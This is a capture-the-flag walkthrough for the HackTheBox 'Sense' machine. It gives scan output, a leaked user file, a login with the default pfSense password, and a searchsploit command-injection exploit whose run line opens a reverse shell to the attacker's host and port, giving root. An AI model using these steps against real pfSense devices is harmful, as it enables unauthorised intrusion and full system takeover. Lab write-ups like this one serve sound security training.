🟢sense

Recon & Enum

port scan

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

directory scan

/index.html           (Status: 200) [Size: 329]
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/edit.php             (Status: 200) [Size: 6689]
/system.php           (Status: 200) [Size: 6691]
/license.php          (Status: 200) [Size: 6692]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
/%7Echeckout%7E       (Status: 403) [Size: 345]

website

it has a login page with pfsense

https://10.10.10.60/system-users.txt/

i found credentials over here , after googling a little i found default password :- pfsense

shell as root

after logging in i found the exact version no. of pfsense :- 2.1.3

searchsploit

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection   | php/webapps/43560.py

searchsploit -m php/webapps/43560.py

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.16.4 --lport 1212 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed

>> and i got the shell as root

PreviousPostman Nextsolidstate

Last updated 2 years ago

hashtagRecon & Enum

hashtagport scan

hashtagdirectory scan

hashtagwebsite

hashtaghttps://10.10.10.60/system-users.txt/arrow-up-right

hashtagshell as root

hashtagsearchsploit